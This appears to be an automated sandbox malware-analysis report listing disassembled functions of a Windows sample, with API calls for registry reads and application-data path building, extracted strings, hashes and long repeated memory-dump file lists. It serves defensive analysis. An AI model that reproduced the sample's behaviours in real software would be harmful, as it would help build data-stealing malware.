                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: d3564b001703de159deca82c01a5c6c19269662debda69a4a030bd14d982ad7b
                        • Instruction ID: 078624a06090e1af2c1ae27170fa9bdd6beb1234dee004e02f9558202cc01850
                        • Opcode Fuzzy Hash: d3564b001703de159deca82c01a5c6c19269662debda69a4a030bd14d982ad7b
                        • Instruction Fuzzy Hash: 6D415C7260020AABDB21DF6CD988BEBBBF8EF44700F11851DA849D7244EE34D985DB90
                        Function 00923130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00923166
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092316D
                        • RegOpenKeyExA.ADVAPI32(80000002,015DB8D8,00000000,00020119,?), ref: 0092318C
                        • RegQueryValueExA.ADVAPI32(?,015EED90,00000000,00000000,00000000,000000FF), ref: 009231A7
                        • RegCloseKey.ADVAPI32(?), ref: 009231B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 88f8f0d2d691ae85eb2fcc31fa378551aa81e82cece56760321a67ee98296dd3
                        • Instruction ID: 1d5dbd96ddecc0a34e8076c9c940c3b1a532a2b4ca653fbdab9d6e9285ef4a6f
                        • Opcode Fuzzy Hash: 88f8f0d2d691ae85eb2fcc31fa378551aa81e82cece56760321a67ee98296dd3
                        • Instruction Fuzzy Hash: 6B118272A04319AFD714CB94EC45FAFB7BCF744711F104219FA05D3280DB7459048BA1
                        Function 009290DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 4b19f08e9ebd8beb68d05a84b423413fe48c82c07629c3135e5bbe63e595e1d1
                        • Instruction ID: 821fa64696fb0763afb129c2601ac4e094f1f0481232c3da7f889846c1e7ee61
                        • Opcode Fuzzy Hash: 4b19f08e9ebd8beb68d05a84b423413fe48c82c07629c3135e5bbe63e595e1d1
                        • Instruction Fuzzy Hash: FF41297050476C9EDB318B25AC85FFBBBFC9B45304F1444E8E99686187E2719A448F20
                        Function 00908980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00908996
                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1D5
                          • Part of subcall function 0092A1C0: std::exception::exception.LIBCMT ref: 0092A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 009089CD
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: invalid string position$string too long
                        • API String ID: 2002836212-4289949731
                        • Opcode ID: 0b87de4008007567a20905866e74eb6639121a16db93b63166674a416776f0f6
                        • Instruction ID: ce0fc88420effdc391baa1ccca5a31be0b53bba87bb00893c68978cc02df6246
                        • Opcode Fuzzy Hash: 0b87de4008007567a20905866e74eb6639121a16db93b63166674a416776f0f6
                        • Instruction Fuzzy Hash: E22194723006519FC720AA5CE840A6BF7A99BE1761B15092BF1D1CB6C1CA71DC41C7A5
                        Function 00908850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00908883
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 8a6775b35c34be6e4003168a2b76671123cdad3d1edbbe82f2a778d216d7a413
                        • Instruction ID: 760ef0ca56a8c4bc18f1a93cf33173b067d6ad7a681cf63ab4821f270c087d95
                        • Opcode Fuzzy Hash: 8a6775b35c34be6e4003168a2b76671123cdad3d1edbbe82f2a778d216d7a413
                        • Instruction Fuzzy Hash: 033195B6F005159FCB08DF58D8916AEBBB6EBC8350F148269E915EB385DB30AD01CB91
                        Function 00925910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925922
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925935
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_std::exception::exception
                        • String ID: Sec-WebSocket-Version: 13$string too long
                        • API String ID: 1928653953-3304177573
                        • Opcode ID: 6bca9424554b0ed11a627f15a4433d10ddb149decee5b973d52fd372bc3c75ca
                        • Instruction ID: 34ea214df552817ba731ece7b46dd7865e76a2190f651de3d6633e177fa20db4
                        • Opcode Fuzzy Hash: 6bca9424554b0ed11a627f15a4433d10ddb149decee5b973d52fd372bc3c75ca
                        • Instruction Fuzzy Hash: B2118235308B61CBD7318B2CF80071AB7E5ABD1760F660A9DE0D187699C771D881CBA1
                        Function 00923CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0092A430,000000FF), ref: 00923D20
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00923D27
                        • wsprintfA.USER32 ref: 00923D37
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 2a5242636971396fbebc2c04d4305ee0c2d047b6fc5e508f8c8037c5ddaa406d
                        • Instruction ID: 08897ca2ac756a68c930b6d0f2292d921d57a7a4a1881ba6b849e1734a4d2923
                        • Opcode Fuzzy Hash: 2a5242636971396fbebc2c04d4305ee0c2d047b6fc5e508f8c8037c5ddaa406d
                        • Instruction Fuzzy Hash: D6018071644714BBE7145B54EC4AF6EBB68FB45B61F200115FA05972D0DBB42900CBA2
                        Function 00908710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00908737
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A188
                          • Part of subcall function 0092A173: std::exception::exception.LIBCMT ref: 0092A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 5f80ca7d90462895d9a205121b72ccd1a6cc46edc1bb6733eda814e958b3da9c
                        • Instruction ID: 563c3c089a96753635316d91679ac939a206fbf987841c373144c0569af97664
                        • Opcode Fuzzy Hash: 5f80ca7d90462895d9a205121b72ccd1a6cc46edc1bb6733eda814e958b3da9c
                        • Instruction Fuzzy Hash: A8F09027B040320FC314643D9D8445FA94A57E579033AD765E89AEF29DDC70EC8295D5
                        Function 0091E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091E544
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E573
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E581
                        • lstrcat.KERNEL32(?,015EEE30), ref: 0091E59C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: d007526e30dcd4661310a4b40feea26865d6a7f6ad47bb5df34a63cda2c74e5f
                        • Instruction ID: e7a129a947737a5685ba95dd458482e090810bef0935cc8b31437014a83997e9
                        • Opcode Fuzzy Hash: d007526e30dcd4661310a4b40feea26865d6a7f6ad47bb5df34a63cda2c74e5f
                        • Instruction Fuzzy Hash: C451C7B5B1020CAFCB55EB54ED46FEE337DEBC8300F540458B91697291EE70AE848BA1
                        Function 00921FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00921FDF, 00921FF5, 009220B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strlen
                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 39653677-4138519520
                        • Opcode ID: 23894e501dece0d2348a70889898f24d3e458ccfbd2784cd7fe6f8a5408f4d96
                        • Instruction ID: 493de8624b2b666b7ef1e9fa11e6205d0755418c5b5994615d93de1e2c843ae5
                        • Opcode Fuzzy Hash: 23894e501dece0d2348a70889898f24d3e458ccfbd2784cd7fe6f8a5408f4d96
                        • Instruction Fuzzy Hash: 39219235590199AFD720FF35E4447EDF36BEF80361F844456C8190B249E336291ADB96
                        Function 0091EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091EBB4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091EBE3
                        • lstrcat.KERNEL32(?,00000000), ref: 0091EBF1
                        • lstrcat.KERNEL32(?,015F0108), ref: 0091EC0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
